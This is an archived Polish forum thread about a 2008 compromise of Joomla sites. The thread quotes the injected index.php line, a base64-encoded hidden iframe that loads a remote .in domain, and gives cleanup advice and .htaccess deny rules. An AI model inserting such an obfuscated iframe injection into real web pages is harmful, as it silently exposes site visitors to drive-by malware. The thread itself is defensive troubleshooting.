PDA

Zobacz pełną wersję : Wirus czy co to?



ostry
21-06-2008, 16:06
Chyba trafiło mi się włamanie. W jakiś sposób przybyła mi jedna linia w pliku index.php



echo base64_decode('PGlmcmFtZSBzcmM9Imh0dHA6Ly9pbi1pbi5 pbi9pbi8iIHdpZHRoPTAgaGVpZ2h0PTAgc3R5bGU9ImhpZGRlb iIgZnJhbWVib3JkZXI9MCBtYXJnaW5oZWlnaHQ9MCBtYXJnaW5 3aWR0aD0wIHNjcm9sbGluZz1ubz4=');
doGzip();
?>Podczas przeglądania strony antywirusy alarmują o wykryciu
Win32:socks-ae(wrm)

Żadnych innych zmian nie stwierdziłem.

O dziwo nie jest nic wykrywane podczas przeglądania Firefoxem, a jedynie w Explorerze. Wirusa łapie Avast, ale też nie na wszystkich komputerach.

Używam Joomla! International Edition 1.0.15 stable i mam dołożonego najnowszego JoomFisha i Google Maps a serwis stoi na Home.pl więc raczej bezpiecznym serwerze.

Sprawdziłem kilka innych moich stron i znalazłem identyczny wpis na witrynach postawionych również na serwerze Nazwa.pl więc to nie kwestia serwera. Wpis ten również czasem figurował w pliku configuration.php - zawsze na końcu pliku.
To samo znalazłem również na stronie postawionej na Joomla! 1.5.1 - czysta Joomla bez żadnych dodatków.

Macie jakieś pomysły, którędy to się dostało?

fampish
26-06-2008, 05:50
Następną razom (a pewnie będzie) zapisz datę nadpisania pliku i wyślij do admina prośbę aby sprawdził Ci logi, kto i jak dostał się na konto i co zmieniał w tych okolicach. Niech Ci podeśle listę nadpisanych w tamtym momencie plików - może być ich kilka a może być kilkadziesiąt :). Ew. sam możesz przeczesywać wszystkie katalogi sprawdzając daty nadpisania plików i tak wyłowić zainfekowane (miłej zabawy - jednego dnia przeczesywałem tak kilka serwisów... niektóre nawet nie wiem jak długo były zainfekowane).
Zdaje się, że jak przeanalizują logi to stwierdzą czy winna jest jakaś dziura w kodzie czy ktoś bezpośrednio zalogował się na ftp (np. mógł 'podsłuchać' hasło). W pierwszym przypadku - szukaj dziury, w drugim - zmieniaj hasła (wszędzie gdzie się da). I nie zapomnij przeszukać ANTYWIREM wszystkich dysków ;)
A tak wogóle to się nie znam i tak tylko sobie gdybam ;) Znalazłem tu kilka rad, ale jakoś nie zawsze skutecznych jak pokazało życie...

ostry
16-07-2008, 01:26
Pobawiłem się trochę i przeryłem wszystkie katalogi w poszukiwaniu zmian - po prostu zrobiłem download całej strony i porównałem z czystym backupem.
Zmienione zostały pliki index.php w katalogu głównym, katalogu bieżącej templatki oraz plik configuration.php. We wszystkich dopisany był ten sam kod.

Przeskanowanie pobranej strony antywirusem nic nie pokazało. O logi zmian poprosiłem, ale bez rezultatu - mądry admin odpisał mi tylko, żebym zaktualizował używane oprogramowanie do najnowszej wersji - ciekawe, co miał na myśli, bo Joomla i jej komponenty są na bieżąco z wersją.

Hasła pozmieniałem, a stronę uzbroiłem w .htaccess - w sumie tylko ten rodzaj zabezpieczenia przeoczyłem przy stawianiu serwisu. Zobaczymy, na ile skuteczne jest to działanie. Na razie regularnie zaglądam w pliki i nie widzę ponownych zmian.

Rybik
16-07-2008, 02:55
to wstawka:

<iframe src="pewna domena z .in" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no> nie klikać!
zablokuj w htaccesie wejście z domen z indii


<Limit GET HEAD POST>
order allow,deny
deny from .in
allow from all
</LIMIT>

jeżeli juz tam masz liste <limit to tylko dopisz do niej
deny from .in

inkos
16-07-2008, 17:16
Rybiek nie jest to potrzebne - moim zdaniem wystarczy miec tylko czystego ale wlasnego kompa z ktorego korzysta sie nie tylko z Joomla (Pisze o tym fampish). Jeden maly trojan a juz nasze dane dostepowe sa u botow a potem mamy takie oto historyjki. :(

ostry
16-07-2008, 23:06
Komputer mam czysty - skanowałem avastem i spybotem s&d. Jeśli to nie wystarczy, to proszę o sugestie, ale moim zdaniem jest ok. Wpisy .htaccess dodałem - wielkie dzięki za rozkodowanie tego draństwa Rybiku.
Po całej przygodzie pozostaje pytanie - którędy to wlazło? Mam wrażenie, że gdyby chodziło o sniffer i hasło ftp to zniszczenia byłyby dużo większe, ale mogę się mylić.

Rybik
17-07-2008, 01:07
1. lista deny ip/domain w htaccess jest jednym z zalecanych środków i nie należy doradzać nikomu ignorowanie takiej aseptyki, od kiedy uaktualniam IPki w moim htaccessie znikło mi wiele dziwnych problemów i nie muszę sie zastanawiać po co jakiś IP łaził mi po dziwnych plikach Joomla co 8 sekund (wcześniej próbował co 2 ale przestawiłem apacza, żeby się nie dał zatykać tak szybko). Co więcej, z mojej listy skorzystał chętnie hostingodawca.
Adresy do blokowania biore z forów typu joomla-security
2. Poszukac prosze w google o wirusie Win32:socks-ae, to worm P2P ale nie chce mis ie wierzyć, że ma związek (ale nie czytałem za wiele)
3. Najbardziej prawdopodobna jest nieszczelność hostingu współdzielonego (np wspólny katalog przechowywania sesji)
4. Powiązany z tematem jest tez Exploit-MS06-014
reszte doczytać :)